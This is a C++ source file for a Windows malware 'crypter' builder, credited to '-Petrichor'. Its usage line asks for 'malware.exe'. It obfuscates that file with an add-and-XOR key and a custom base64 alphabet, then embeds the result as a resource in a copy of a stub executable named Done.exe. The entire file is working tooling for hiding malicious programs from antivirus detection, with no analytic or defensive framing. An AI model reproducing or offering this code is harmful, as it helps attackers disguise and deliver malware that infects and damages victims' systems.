#pragma warning(disable: 4244) #include #include static char encoding_table[] = { '=', 'w', 'e', 'r', 't', 'y', 'u', 'i', 'o', 'p', 'a', 's', 'd', 'f', 'g', 'h', '-', 'k', 'l', 'z', 'x', 'c', 'v', 'b', 'n', 'm', 'Q', 'W', 'E', 'R', 'T', 'Y', '<', 'I', 'O', 'P', 'A', 'S', 'D', 'F', 'G', 'H', 'J', '/', 'L', 'Z', '@', 'C', 'V', 'B', 'N', 'M', '9', '8', '7', '6', '5', '4', '3', '2', '1', '0', 'X', 'j' }; static DWORD mod_table[] = { 0, 2, 1 }; char *mEncode(const byte *data, DWORD input_length, DWORD *output_length) { char *encoded_data; DWORD i, j; *output_length = 4 * ((input_length + 2) / 3); encoded_data = (char*)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, *output_length); if (encoded_data == NULL) { return NULL; } for (i = 0, j = 0; i < input_length;) { __int32 octet_a, octet_b, octet_c, triple; octet_a = i < input_length ? (BYTE)data[i++] : 0; octet_b = i < input_length ? (BYTE)data[i++] : 0; octet_c = i < input_length ? (BYTE)data[i++] : 0; triple = (octet_a << 0x10) + (octet_b << 0x08) + octet_c; encoded_data[j++] = encoding_table[(triple >> 3 * 6) & 0x3F]; encoded_data[j++] = encoding_table[(triple >> 2 * 6) & 0x3F]; encoded_data[j++] = encoding_table[(triple >> 1 * 6) & 0x3F]; encoded_data[j++] = encoding_table[(triple >> 0 * 6) & 0x3F]; } for (i = 0; i < mod_table[input_length % 3]; i++) { encoded_data[*output_length - 1 - i] = '#'; } return encoded_data; } void Encode(byte *Data, DWORD Key, DWORD Size) { for(DWORD i = 0; i < Size;i++) { Data[i] += Key; Data[i] ^= Key; } } int main(int argc, char **argv) { std::cout << "Cpp Crypter example made by -Petrichor"; if(argc != 2) { std::cout << "\nUsage: " << argv[0] << " malware.exe"; return 1; } HANDLE ReadHandle = CreateFile(argv[1], GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); if(ReadHandle == INVALID_HANDLE_VALUE) { std::cout << "\nCouldn't read the file. Make sure it exists. Best way is to drag and drop."; return 1; } DWORD inputSize = GetFileSize(ReadHandle, NULL); if(inputSize == INVALID_FILE_SIZE) { std::cout << "\nCouldn't get the file size."; CloseHandle(ReadHandle); return 1; } byte *inputData = static_cast(HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, inputSize)); if(inputData == NULL) { std::cout << "\nNot enough memory."; CloseHandle(ReadHandle); return 1; } DWORD check = 0; if(!ReadFile(ReadHandle, inputData, inputSize, &check, NULL) || check != inputSize) { std::cout << "\nCouldn't read the file bytes or amount of read bytes is not correct."; CloseHandle(ReadHandle); if(inputData != NULL) { HeapFree(GetProcessHeap(), HEAP_ZERO_MEMORY, inputData); } return 1; } Encode(inputData, 1337, inputSize); DWORD Encodedlen = 0; char *Encoded = mEncode(inputData, inputSize, &Encodedlen); if(Encodedlen == 0 || Encodedlen != 4 * ((inputSize + 2) / 3)) { std::cout << "Something went wrong while encrypting the data"; CloseHandle(ReadHandle); if(inputData != NULL) { HeapFree(GetProcessHeap(), HEAP_ZERO_MEMORY, inputData); } else if(Encoded != NULL) { HeapFree(GetProcessHeap(), HEAP_ZERO_MEMORY, Encoded); } return 1; } if(!CopyFileA("Stub.exe", "Done.exe", FALSE)) { std::cout << "Stub is missing."; CloseHandle(ReadHandle); if(inputData != NULL) { HeapFree(GetProcessHeap(), HEAP_ZERO_MEMORY, inputData); } else if(Encoded != NULL) { HeapFree(GetProcessHeap(), HEAP_ZERO_MEMORY, Encoded); } return 1; } HANDLE hResource = BeginUpdateResourceA("Done.exe", NULL); UpdateResourceA(hResource, RT_RCDATA, "Strings", LANG_NEUTRAL, Encoded, Encodedlen); EndUpdateResourceW(hResource, NULL); CloseHandle(ReadHandle); if(inputData != NULL) { HeapFree(GetProcessHeap(), HEAP_ZERO_MEMORY, inputData); } else if(Encoded != NULL) { HeapFree(GetProcessHeap(), HEAP_ZERO_MEMORY, Encoded); } std::cout << "\nAll done."; return 0; }